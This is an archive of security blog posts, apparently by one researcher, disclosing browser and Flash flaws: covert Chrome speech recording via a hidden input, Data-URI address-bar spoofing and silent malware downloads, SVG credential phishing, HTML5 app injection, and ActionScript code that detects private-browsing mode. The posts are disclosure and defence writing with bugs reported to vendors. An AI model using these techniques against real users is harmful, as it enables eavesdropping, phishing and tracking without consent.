Category Archives: Security

To Listen Without Consent – Abusing the HTML5 Speech

tl;dr;
I found a bug in Google Chrome that allows an attacker to listen on the user speech without any consent from the user and without any indication. Even blocking any access to the microphone under chrome://settings/content will not remedy this flaw.

Try the live demo… (Designed for Mac  though it will work similarly on any other OS)

Watch the video…


The Sisyphus of computer science

Speech recognition is like the Sisyphus of computer science. We came a long way but still haven’t reached the top of that hill. With all that crunching power and sophisticated algorithms, computers still can’t recognise some basic words and sentences, the kinds that the average human digest without breaking a sweat. This is still one of the areas that humans easily win over computers. Savor these wins, as it will not last much longer;)

One must appreciate Google for pushing this area forward and introducing speech recognition into the Chrome browser. The current level of speech support in Chrome allows us to create application and websites that are completely controlled form speech. It open vast possibilities – form general improved accessibility to email dictation and even games.

The current speech API is pretty decent. It works by sending the audio to Google’s servers and returns the recognised text. The fact that it sends the audio to Google has some benefits, but from applicative point of view it will always suffer from latency and will not work offline. I believe that the current speech support was introduced with Chrome 25. From Chrome 33 one can also use Speech Synthesis API. – Amazing!

But…
Before this fine API we currently have, Google experimented with an earlier version of the API. It works quite the same, the main difference is that the older API doesn’t work continuously and needs to start after every sentence. Still, it’s powerful enough and it has some flaws that enable it to be abused. I believe this API was introduced with Chrome 11 and I have a good reason to believe it was flawed since than.


More Technical Details

Basically, this attack is abusing Chrome’s old speech API, the -x-webkit-speech feature.
What enable this attack are these 3 issues:

  1. The speech element visibility can be altered to any size and opacity, and still stay fully functional.
  2. The speech element can be made to take over all clicks on the page while staying completely invisible. (No need to mess with z-indexes)
  3. The indication box (shows you that you’re being recorded) can be obfuscated and/or be rendered outside of the screen.

The  POC is designed to work on Chrome for Mac, but, the same attack can be conducted to work on any Chrome on any OS.

This POC is using the full-screen mode to make it easier to hide the “indication box” outside of the screen.
It is not mandatory to use the HTML5 full-screen; it’s just easier for this demo.

As you can see in the demo and video there is absolutely no indication that anything is going-on. There are no other windows or tabs, and no some kind of hidden popup or pop-under.
The user will never know this website is eavesdropping.

In Chrome all one need in order to access the user’s speech is to use this line of HTML5 code:
<input -x-webkit-speech />

That’s all; there will be no fancy confirmation screens. When the user clicks on that little grey microphone he will be recorded. The user will see the “indication box” telling him to “Speak now” but that can be pushed out of the screen and / or obfuscated.

That is enough in order to listen to the user speech without any consent and without giving him any indication. The other bugs just make it easier but are not mandatory.

(For the tree in the demo I have used a slightly altered version of the beautiful canvas tree from Kenneth Jorgensen)

— The bug was reported to Google.

grey_mic

Found a CSRF Flaw in a Big E-Commerce Website

tl;dr

I stumbled upon some CSRF flaws in a very popular e-commerce website. CSRF flaws are generally overlooked and the only way for you as the user to minimize the risk is to logout from a website after you finished using it. This will limit the window of being vulnerable to attacks to the time you spend on a website. I have disclosed my finding to the e-commerce website and will post it here after they’ll finish fixing it.


This is how these CSRF flaws generally works

When you login to a website you get back a cookie that indicates who you are and the fact that you are authenticated.
Now, for better user experience and so you won’t need to re-login, most websites tell your browser to keeps the cookie for very very long time (up to 10 years is considered safe).
The problem is that if a website suffers from any CSRF flaws, and many still do, from now-on every-time you visit any unrelated internet content it may be attacking you. Think of all these slightly phishy content you stumbled upon over the past years, some of it could have been attacking you.

A famous case of CSRF attack against a bank was using a legitimate AD and abused a flaw in the bank website to transfer user’s money. Gmail suffered from a CSRF flaw in its early days, leaking all of its user’s contacts.

CSRF flaws are used to steal sensitive data from users and to perform actions on the user’s behalf. The flaw I found enables both – an attacker can steal user’s personal data and also mess with his assets.


How I stumbled upon it

I was surfing on an open public WiFi – generally a bad thing to do but I needed to. This public WiFi had a phishy name “eyes2″ and there are few other “eyes” circling around – “eyes1″, “eyes2″, “eyes3″, etc’. Call me paranoid but it seems to me that these access points were put there in order to eavesdrop. Might be just for fun might be more. Anyhow, I generally don’t care as long as I keep all of my traffic in SSL. I don’t care them getting my metadata. So I went to this huge e-commerce website just to check something and was amazed it’s not all SSLed. Wow… I wondered… what kind of data have I just leaked to the MITM from the “eyes2″ access point?! Apparently, if someone is eavesdropping on my connection he now knew exactly who I am and more.

The fact that any website that deals with even slightly sensitive data, and doesn’t use SSL for all of its traffic is a flaw on its own. But SSL is not related to these specific flaws, in fact using SSL doesn’t help to prevent CSRF flaws. It’s only because I wanted to know exactly what kind of data this website leaked by using plain http and not https (SSL), I found out it’s also vulnerable to CSRF attacks.


Where are all the details?

I reported my finding to the e-commerce website. It took me way longer to find the appropriate way to contact them than to find the flaws and PoC it. I did eventually managed to report it and they were very responsive about it and seemed like they already started to fix it. I will post all the details after they’ll finish fixing it.

As a website owner it’s important to remember to implement CSRF prevention from the get go. Most web frameworks have their own solutions already. It’s very easy to overlook it. It’s very easy to use something like JSONP and to forget how vulnerable it can be, for example.


How to protect yourself

CSRF is generally based on cookies, what you can do to protect yourself is to logout or delete your cookies after you finished using a certain website. That won’t be bulletproof since you’ll still be vulnerable to attacks while you’re logged-in. The only way to be completely safe is to use only 1 window with only 1 tab while you are logged-in.

Obviously all of this is a complete hassle, and website owners should be the ones responsible for their CSRF flaws. The user can’t be expected to do it.

If your using firefox you may use something like noscript, which also involve some level of annoyance.

Abusing The HTML5 Data-URI

[Update: Some of these examples were mitigated in Chrome 38 and 39]

After seeing in the previous post how Data-URIs can be used as a mechanism to easily carry malicious code, I’ll elaborate more about the issues it presents.

Some of it merely exists from the way Data-URIs are designed and implemented, and some of it might be considered as security bugs in the browsers.

Using Data-URI to manipulate the address bar

The simplest thing an attacker can do is to add spaces after the “data:” in the URI and by that it can make it look like it some kind of a Chrome internal page.

It will also change the link status in the bottom of the browser. The link will show “data:” hiding all the base64 code that is there. It’s a way to manipulate the status bar without the need of JavaScript. Hence the link will be manipulated even in an environment that doesn’t allow JavaScript.

Combine that attack with the previous example of the phishing SVG and you can get catastrophic results. Lots of users might believe this is an internal Chrome page.

Live example (Open in Chrome)

data_address_bar

While in the above example the user will see only “data:..” in the address bar. If he’ll feel uncomfortable the user can still examine the address bar and might find the hidden base64 code.

The next example will show how to prevent the user from examining the address bar at all, and it’ll always show “data:” The 3 dots indicating there might be more to it – will be removed as well.

By making the original content larger than ~28KB the address-bar will always show “data:” and only data.

data_status_bar

Live example of only data in the address-bar (Open in Chrome)

data_big_address_bar

While Chrome is the most vulnerable to the Space attack, other browsers will fall for it too.

FireFox trim the spaces when you click on the link, but an attacker will still be able to manipulate the status-bar (at the bottom of the browser). As we’ll see in the next vector.

Safari doesn’t trim the spaces but instead convert it to %20 or any other Unicode escaped representation of a space. It’ll work with any combination of unicode spaces.

data_safari_address_bar

Mobile Chrome for iOS.  It was a bit surprising to see that the Chrome version for iOS will fall for the “Over 28KB base64” attack.

data_chrome_iphone

It interesting to see that even Chrome for iOS which is very different environment, share the shell code with all of the other Chrome browsers.


Tricking the user to download malicious content using the DATA URI

We already seen how one can abuse the browser’s address-bar and the status-bar by simply adding spaces after the “data:” in the link.

But what if we add any other character, other than space.  In that case, the users will be prompted to download a file (by default the user won’t be prompted and the file will just download)

How convenient for an evil one. Combining that with the previous stuff…

The user will see data:http://google.com/graphics/doodle.svg in the status-bar, clicking the link will automatically download the attacker’s malicious SVG file that is hiding in the base64 code inside the link.

data_doodle_chrome

Click to download doodle.svg (not really a doodle)

As noted before, FireFox trim the spaces after the “data:”, but one can use %20 instead. Also, FireFox does a good job and put an ellipsis in the middle of the link in the status-bar. So the user will see the suspicious gibberish base64 at the end, But that can easily overcome with simply adding spaces at the end of the link as well.

data_doodle_firefox

Click to download doodle.svg (FireFox version)

The interesting thing is that this kind of attack doesn’t limit us to SVG, any kind of file can be downloaded this way, any kind of binary file as well.

How about an EXE (that EXE does nothing but to echo some text to the terminal)
(Will add it latter)

Remember COM executables? Only few bytes, 32bit windows will still run it, still many of these are out there.

COM executable

ZIP is a great bad vector IMHO

ZIP with badies inside (not real badies just text files)

chrome_zip_download

While on windows an attacker will also need to trick the user to change the extension of the file or to make him “Open With…” the file with a certain app. On the MAC these extension doesn’t matter much.

The file will be opened or executed according to its real type.

The new Mac OSes have this great feature called Gatekeeper that makes running applications way more secure in general.

The default settings is “from app-store AND identified developers”. How difficult is it for a motivated attacker to become an “Identified Developer”?

If the user have disabled Gatekeeper the app will just run when clicked.

It will probably work on old macs, but anyway I think that the most dangerous attack will be using just a zip file with all kind of badies inside.

The user flow might be:

  1. Click on a link -> File is immediately downloaded (there is no wait as the file is already embedded no the page)
  2. Click on the downloaded file -> file is automatically extracted (if the zip is small enough the user won’t notice much going on as the extraction will be fast)
  3. Malicious apps will be spread all over the user’s Downloads folder.
  4. “Hopefully” one day the user will notice these apps and its inviting names and will run one of these – thinking he downloaded it himself.

These are most of the browsers I’ve tested on, other browser may behave differently, generally it works the same on ubuntu as well.

IE (Internet Explorer) – does not suffer form most Data-URIs flaws, it does it by not supporting most of its features.  I don’t think that getting away with it by not supporting it is generally a good thing.

Final notes about these vectors: (repeating some from the previous post)

  1. Remember that no JavaScript is needed for any of this, all that is needed is a link. It’ll work just the same with JavaScript disabled.
  2. No server is involved either.
  3. All an attacker need is a bunch of strings and the user’s browser will do all the rest.
  4. AV won’t scan these links.
  5. Not easily blockable – no domain to block.
  6. More easily shared and distributed.
  7. The attack is also cached in the browser history and doesn’t need Internet connection to be present at the moment of the attack.
  8. Will propagate across devices. For example, if you’re signed-in into Chrome the attack will propagate to all of your devices. (You’ll still have to run it on each device though, just type data in the address bar).
  9. Can be easily embedded in the naively looking *.URL file. Who doesn’t click on these? It always felt safe.

 

— Reported the bug to Google.

SVG For Fun and Phishing

What an awesome format is SVG, so powerful and so well supported by browsers. And yet it is barely being used, it’s not getting the love it deserves. Well, browsers love SVG, perhaps too much…

SVG files are like little bundles of joy. Encapsulating graphics, animations and logic. One can write a full app or game all encapsulate in one SVG file. That SVG file can be compressed into a binary file with the extension of SVGZ and browsers will still accept it.

Its way less powerful than Flash but the concept is similar – vector graphics and logic in one binary file. And like Flash SWF files – these files tend to get viral and to be re-distributed. And by that I mean, once you release your attack in the wild it can get hosted from many other servers. A good example would be, tiger.svg.

Remember the lovely Flash dog?  It can work just the same and even worse.

SVG also run from local files. By default, on Windows, SVG files are opened in IE, which will run the script with local privileges when it’s double clicked. 

Anyhow, SVGs have some flaws built in into them; many are known some are new. I will argue that even without the new flaws an SVG file is somewhat dangerous by-design. I wanted to see how easy it would be to abuse SVG for phishing. I picked an easy target – Chrome’s “Sign In” page. It was pretty easy to create an almost fully functional version of the Chrome Sign In page.

Check it out only 5kb of SVG “Image”

Compressed as an SVGZ, only 2kb (Chrome will run it just fine) 

Note: Google already changed the appearance of this page, but it almost identical to the previous version.

This page is generally here  (google already changed the way it looks)

Letting SVG files execute JavaScript is actually the root of the problem. I’m not sure it serves any real purpose in today’s web.

A simple attack might goes like this:

  • The attacker will send the victim an email with a malicious SVG file “Checkout this cool image / animation”.
  • The victim will downloads the SVG and click / double click on it.
  • SVG is opened in the browser.
  • Attack taking place.

The JavaScript that will run will have local privileges and can easily attack the user (limited to the browser sandbox of course). It can for example – execute multiple cross-domain CSRF attacks (cookies are sent normally with every requests) and/or load multiple other attack vectors. Can be abused for spam, and that is not even illegal as long as long as the attacker doesn’t do anything too malicious.

You may be thinking “so what?!” you can script the user from an html page just as well.

There are few differences, as most users will look at SVG file as just another image.

  1. When you double click on an image to view it can’t execute anything –SVG can.
  2. SVG files get redistributed – there are numerous clip art sites that will host the evil SVG for the attacker.
  3. The malicious code embedded in SVG files will sustain after editing the file in graphic editors like Adobe Illustrator and Inkscape.

I would say that the main problem here is not what SVG files are capable of doing, and it’s more about the way they can get malicious code slip through the user’s normal defenses.

Wait there is more…


Even more fun with SVG and HTML5 Data-URI

Another great feature of HTML5 is Data-URI. Now, SVG is working great with Data-URI. Malicious SVG works amazingly great with data-URIs.

SVG encoded, as Base64 will run directly from a link.
Some might call this a feature but it can be exploited for phishing attacks.

POC of an SVG phishing attack embeded in an HTML5 Data-URI

Some of the attacker benefits are:

  1. This is just a link, no need to host anything.
  2. AV won’t scan these links.
  3. Not easily blockable – no domain to block.
  4. More easily shared and distributed.
  5. The attack is also cached in the browser history and doesn’t need Internet connection to be present at the moment of the attack.
  6. Will propagate across devices. For example, if you’re signed-in into Chrome the attack will propagate to all of your devices. (You’ll still have to run it on each device though, just type data in the address bar).
  7. Can be easily embedded in the naively looking *.URL file. Who doesn’t click on these? It always felt safe.

Everything said here is valid to all Data-URIs supported formats; notable is also text/html:
Here is an example

Actually Data-URIs have their own set of problems, which are not necessarily related to SVG. It works perfectly with SVG but the issues are more general. I’ll elaborate more in another post.

More about the demo (Chrome Sign In)

I don’t want give too many ideas for the bad guys, but the possibilities here are endless, I can already think of far more nasty vectors than this demo.

This specific demo has an image of the Google logo. I managed to create the Google logo as an SVG in about 7kb, but the Google logo in the demo is anyhow small and not too noticeable, it felt like a waste of KBs.

I found that the font used be Google for their logo is catull, which is an old style serif typeface, and is similar to … you guessed it… Georgia, that was good enough. Georgia is preinstalled on all OSs.

I know that might look horrible to fonts and esthetics lovers, but the average victim will easily fall for it.

One of the most important features of this attack is the SVG text-input. The user will need to enter his credentials somewhere.

Text-inputs are not natively available in SVG, though there were some attempts to create them.

I didn’t create fully functional text-inputs, didn’t think it’s appropriate for me to do it at this point – for various reasons. For one, I didn’t want to make it too easy to replicate this attack in the real. I’m sure that nearly perfect SVG text-inputs can relatively easily be created – one just need enough motivation.

What about mobile?

Smartphones are just fine with SVG, more on that later as well.

Some tip to keep you safe

  1. Be alert when clicking on links that direct to SVG files or Data-URIs.
  2. Don’t double-click on SVG files to preview it in your browser.
  3. Don’t preview unknown or unchecked SVG files in your browser.
  4. Don’t export SVG from Adobe Illustrator and Inkscape without knowing where it came from and making sure it has no malicious script.

Protecting Your Smart Phone, the Basics

iPhone

  1. Don’t jailbreak, a not jailbroken iPhone is a pretty secure device.
  2. Use PIN code Settings -> General -> Passcode (and not something like 1234)
  3. Make sure data is really encrypted – default since iPhone 4 (which have hardware encryption). If you have an older version go to Settings -> General -> Passcode and look for “Data Protection is Enabled” on the bottom.
  4. Don’t install any profiles you’re not absolutely sure about. I saw that some ads company started to use these profiles in order to overcome the App Store restrictions. If you see something like this don’t approve it unless your absolutely sure. Here’s some more info about the danger of malicious profiles.
  5. Consider using alphanumeric passcode by setting “Simple Passcode” to “Off”
  6. Don’t use Consider not using “Find My iPhone”. This is a trade off, “Find My iPhone” is really great tool for finding your lost phone. But, there is a 1 failure point which is your apple ID. Accessing it will gives attackers your exact position and an easy way to wipe all of your phone data.

Android

  1. Don’t root your phone
  2. Use a screen lock
  3. Encrypt data – works better from Android 4.0 and above, might affect performance (it does not encrypt external SD card)
  4. Use a security app like Lookout or AVast – it’s free!
  5. Don’t install an app unlesss you have decent amount of confidance in it, also check the permisisons it requires. Remeber to uninstall it if it’s useless.

We all know that Android is open and its apps needs no approval, which make it more vurenable by nature. This openness has another aspect of vurnability, external SD cards will have variant quality and because of that the Android OS doesn’t encrypt it. It can’t promise a good enough performance on cheap external memory. Which make sense in a way, your somewhat compromising security by being open.

Windows 8 Phone
Never had a windows 8 phone only 7.5, but it’s obvious that Microsoft is batting big on their most loyal enterprise consumers, that need enterprise security. From reading online it seems that it has a built in encryption but not for the SD card (same as Android).

Common sense still applies.

  1. Use screen lock 
  2. Encryption is built in for you, just don’t save anything important on the external SD card.

HTML5 Mobile Apps – Injection Heaven, Security Hell

Three weeks ago Path.com was fined for stupidly stealing their user’s contact list and saving it onto their servers. Path’s doing was obviously wrong but I’m not sure that their punishment was really justified, needing to pay this enormous bribe to the FTC using COPPA as an excuse. The lesson here is to always comply with COPPA.

Anyhow, in that same techcrunch article you can also find that “The FTC also took the opportunity to introduce a new set of guidelines for mobile developers“. Although they explain early in that article that it’s not meant to be a guideline, I still feel they misses a lot.

When it comes to HTML5 apps even the simplest app can greatly compromise the user privacy and security. If we’ll take the FTC example of a simple and harmless alarm clock app, If that app is built using HTML5 its size and complexity doesn’t matter. All that is needed is one javascript injection that will pass thorough.

How will that code be injected you may ask – all that is needed is for the app to load some content from a remote server the simplest example will be the “Terms And Condition” page which is mostly loaded into a WebView. It can be a more “complex” settings, like choosing the favorite color or loading the saved alarms. Any kind of sharing will probably be way more open to be exploited, i.e. “share your favorite alarms”. Push messages might also bring malicious code. ETC’

The bottom line is that any injection of javascript will give an attacker a lot of control over the device, more often than not it’ll be persistant. HTML5 apps usually use the localStorage that is rarely flushed, and leverage native DBs and the file system. The “page” or webview is rarly refreshed, so even if the injection is not persistant it’ll be alive for a long time.
Things like stealing the user’s contact list and tracking the user location are pretty common. Enabled by default in iPhone PhoneGap for example.

It’s only limited by the native API that is opened to Javascript, generally it’s very open, even more than the PhoneGap default API. I know of at least 1 popular HTML5 app that opens almost all of the Android native API.

You see, Javascript is one tough beast – it can run almost anywhere.
Javascript was designed basically as a none important sidekick to the browser’s HTML, “it should not cause any problems by being poorly written and should fail silently and not interfere with the main thing that is HTML.” Seriously that how it was, we’re lucky it’s not case insensitive. I’m sure that back than some people though it’ll make it simpler and better.
So, Javascript will run in any dom element no matter how naive you may think it is, it will run in unexpected parts of the element without needing the <script> tag, i.e. onerror=”attack()”. It used to even run from CSS and from images, but we’re over that now asfaik in mobile browsers.

As opposed to that, it’ll take a very special case for injection to be able to execute arbitrary native code. You can make a native android app that will run anything – even get root, but I doubt that any legitimate app regularly download strings and run it as commands. (basically on rooted Android you can do exec(“su”) and everything else)

With Javascript the app does not need to be designed in any special way, an unsanitizes string will likely to execute.

These kind of injection are not the sole problem of PhoneGap based applications.
Any app that uses HTML5, even if it’s mostly native, any API that is opened to javascript can be leveraged by an attacker.

Phonegap (Cordova) has a mechanism to white list remote hosts which is really only effective on the iOS. It adds a little bit of security, but many apps anyway uses a wildecard “*” to allow all hosts. The wildcard is used by default in the phonegap cloud (saas solution to build phonegap apps)

As you can see the option for an attacker are enourmoe, all it needs is one vector of injection and there is an open path (no phan) to take over all of the devices of all of the users.

HTML5 apps that runs inside the mobile browser are also a nice target for injection attacks, althouygh it’s lacking most of the native api, there is still access to location in all mobile browsers. It’s less powerful for the attacker since it’ll prompt the user way more vigusly.
The Dolphin Mobile Browser implement the full phonegap native api, for example (which is generally a good thing), but it makes in-the-browser websites and apps more exposed to attacks.

So what to do than?!
– Sanitize sanitize sanitize all user input, server and client!

Say What, Flash is More Secure Than HTML5?!

So my favorite script kiddy and copycat, Feross (copied, note the shameless “I discovered” in his Quora post, LoL)
Found a social engineering flaw in the HTML5 fullscreen mode that can be used for phishing attacks. This time it might be even his own finding… what do you know ;)

This flaw is very much similar to the well known and very old picture-in-picture
Picture-in-Picture Phishing Attacks and Operating System Styles
More info..
IMHO the old version is still way more dangers for phishing.

So How Flash is more secure?

What enables this HTML5 fullscreen flaw to exist in his prime is the fact you have full keyboard access. This way an attacker can more easily steal the user’s credentials.
After all fullscreen was existant in Flash for many years now, yet it was never compromised this way. The main reason is that Flash is more secure is that it does not allow full keyboard interaction in fullscreen.

Good thinking Adobe, taking care our security… oh wait… Flash was added with this feature with version 11.3… after all Flash can’t be left behind…
Working demo…

Damn… but still Flash gives you a decent popup confirmation which HTML5 doesn’t

Yeah, I know Chrome give you a popup too, but you don’t have to click on it to get FULL keyboard access.
I constructed this “amazing” demo here (chrome only), as you can see you get the message but the keyboard is fully functional and accessible through javascript.

So still Flash is more secure than HTML5 – in that respect.

It takes us back to what me and other were preaching about, that with great power comes great responsibility.
HTML5 have its own flaws and the more powerful it’ll become it will get even more.

Stay tuned…

Webcam ClickJacking Revived

Two weeks ago this guy managed to revive my 3 years old Webcam ClickJacking POC and also managed to revive some of the buzz surrounding it.

The revived attack is exactly the same as my 2008 POC it even uses lots of my code. The different is that instead of using the settings manager html page as the source of the iframe it’s now uses the setting manager swf directly. Actually, this was the first thing I’ve tried after Adobe frame bust the settings manager pages. It didn’t work well for my windows browsers so I’ve ditched it. One of the first comment on my Webcam Clickjacking post created the same thing and gave a link to it (it is now links to an AD). So obviously everyone knew it or at least thought about it – everyone except Adobe.

The Flash Player provide great power on the web, it’s still the only practical mean to interact with the user’s webcam and microphone. You know the cliché, with great power comes great responsibility. Adobe needs to be vigilant when it comes to her users security and privacy, and her users are practically everyone.

Obviously that every new version of the Flash Player should go through vigorous security testing. It’s also needs to be done with every new browser and OS version. That’s a huge matrix but it needs to be done. For example, browser change the way they embed plugins which can easily leads to flaws even if the Flash Player stays the same.

Back than Adobe knew about the ClickJacking beforehand coz they were informed by RSnake and Jeremiah Grossman. They didn’t knew specifically about my POC and the way it exploits the settings manager, but anyhow they should have at least frame-bust every related page. It’s insane that in all of these 3 years no one bothered to at least Flash-bust the settings manager SWF and prevent the resurrection of my POC.

BTW, good job Feross Aboukhadijeh, my name is Guy Aharonovsky – whois is easy…

John Smith’s younger brother, Adam

Update: Youtube has revived my video. you can now watch Webcam Clickjacking as much as you like. —

Remember ClickJacking? The generic flaw in web browsers and HTML. Remember Webcam Clickjacking? My PoC showing how this flaw can be used to take control over a victim webcam and mic.

Well, my PoC, to my surprise, created a lot of buzz when I published it and the related youtube video got 1,220,966 views – most of it from its first day.

view_count

Yesterday I got an email from youtube titled “Video removed – Copyright Infringement”. At first I thought it’s just another spam mail, but looking inside it and than trying to watch my video gave me an alarming red webpage, with the bold text “This video is no longer available due to a copyright claim by Adam Smith.

WTF, what copyright shmopiright, my video has no sound and barley a screen capture of my mouse. In-fact I sometime claim it to be the most dull video with the most views.

My immediate suspect was Adobe, but it made no sense, if they wanted to, they should have done it when it was hot. Than again sense and Adobe legal dept’ doesn’t always go together. flashObject anyone?

Googleing for such a generic name as “Adam Smith” gives about 3,570,000 results, apparently it’s more generic than “John Doe”. Googleing for “Professor Adam Smith” from adobe gives some possible options but it’s still not informative enough and too vague.

So who is this MR. Generic claiming I’ve stole his precious copyrights. Maybe he’s just a fake dude trying to annoy. Even if he’s real, I guess when you have such a generic name you don’t care to be hated, nobody is gonna correlate your face with your name anyway.

Anyhow, I’ve filed a counter-notification and hopefully the video will be up again soon. Even if it won’t, I’m sure it’ll appear in some other places.

There is a lot of info regarding “my video was removed from youtube” just google it, if you need to.

There is a lesson to be learned here, one should never trust google, and alike with their important assets. It can get shut-down in an instance. Personally I don’t care much about this video, I didn’t get a dime out of it and its heydays are long gone. But, there are cases where people lost all of their income one day since google removed their blogspot hosted blog, for example.

If you want full control over your videos and such, you should be hosting it yourself, and on some remote island. Than again, they still be able to cut your cable.

I just wonder where the hell is the decentralized web?! Too few people are controlling too much stuff.

Flash Private Browsing Fixed – Not Good Enough

I was going to congrat Adobe for their fix to the private browsing in Flash, this was my original text:

I’m glad to say that Adobe has fixed the minor issue they had with the new Flash Player 10.1 private browsing. I’ve written before on how a developer can tell the user’s browsing mode.

The Flash Player that is installed with CS5 is 10.1.52.14 which still suffer from this bug. If you surf the web using private browsing mode you should update the Flash Player to the latest, currently, 10.1.53.38 (RC4). Actually you should update it anyway.

But, when I went to see what have they changed in order to fix it. I saw that both modes, now, have the same limit of 100KB, but it’s still differ. While trying to save more than 100KB in normal browsing mode the status is “pending” while in private browsing mode it immediately fails.

Making this demo functional again required changing 1 line of code. Using any Flash Player, from 10.1_beta2 till latest 10.1.53.38(RC4) should show you if you’re in private mode or not.

So, please, again, normal and private browsing modes should behave exactly the same from a developer standpoint. Making local storage limit the same 100KB was a step in the right direction, but, it’s not enough. Let any Flash content ask for more storage even if it’s in private mode and allow the user to accept it, just remember to delete the user’s choice along with the local storage.

BTW, it might be possible to trick the browsers to tell you the user’s browsing mode, using HTML5 localStorage for example, and without using Flash.

The updated source code is below:

package {
	import flash.display.Sprite;
	import flash.display.StageAlign;
	import flash.display.StageScaleMode;
	import flash.events.NetStatusEvent;
	import flash.net.SharedObject;
	import flash.net.SharedObjectFlushStatus;
	import flash.text.TextField;
	import flash.text.TextFieldAutoSize;
	import flash.text.TextFormat;
	import flash.utils.getTimer;
	import flash.utils.setTimeout;

	/**
	 * This class will tell the current browsing mode of the user
	 * Tested with Flash Player 10.1 beta 2 - 10.1.53.38 (RC4)
	 * for more info go to:
	 * http://blog.guya.net
	 */

	[SWF(backgroundColor="#FFFFFF", width="400", height="35")]
	public class KissAndTell extends Sprite
	{
		private var _tf:TextField;

		public function KissAndTell()
		{
			initStage();
			createTF();
			setTimeout(saveData, 300);
		}

		private function initStage():void
		{
			stage.scaleMode = StageScaleMode.NO_SCALE;
			stage.align = StageAlign.TOP_LEFT;
		}

		//try to save 140kb into the local storage
		private function saveData():void
		{
			var kissSO:SharedObject = SharedObject.getLocal("kissAndTell");
			kissSO.data.value = getDataString(140);

			var status:String;

			try
			{
				status = kissSO.flush();
				kissSO.addEventListener(NetStatusEvent.NET_STATUS, netStatusHandler);
			}
			catch(ex:Error)
			{
				trace("Save failed - private browsing mode");
				setPrivateText();
			}

			if(status && status == SharedObjectFlushStatus.PENDING)
			{
				trace("Pending status - normal browsing mode");
			}

			/***  Changed in the newer versions of the Flash Player 10.1 beta ***/
			//If we can save more than 100kb then we're in Private Mode
			else if(status && status == SharedObjectFlushStatus.FLUSHED)
			{
				setPrivateText();
            }
		}

		//Listening to this event just to prevent exception on debug players
		private function netStatusHandler(event:NetStatusEvent):void
		{
			trace("event.info.code: " + event.info.code);
		}

		private function setPrivateText():void
		{
			_tf.text = "Private Browsing Mode";
			_tf.backgroundColor = 0xAA2222;
		}

		private function createTF():void
		{
			_tf = new TextField();
			_tf.autoSize = TextFieldAutoSize.LEFT;
			_tf.defaultTextFormat = new TextFormat("Arial, Verdana", 20, 0xFFFFFF, true, null, null, null, null, null, 10, 10);
			_tf.text = "Normal Browsing Mode"
			_tf.backgroundColor = 0x22AA22;
			_tf.background = true;
			addChild(_tf);
		}

		private function getDataString(kb:int):String
		{
			var t:int = getTimer();
			var word:String = "GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_GUYA.NET_";
			var count:int;
			var a:Array = new Array();
			var lenNeeded:int = kb * 1024;
			while(count * word.length < lenNeeded)
			{
				a.push(word);
				count++;
			}

			var ret:String = a.join("");
			trace("time for generating " + kb + "kb: " + String(getTimer() - t) + " ml");
			return ret;
		}

	}
}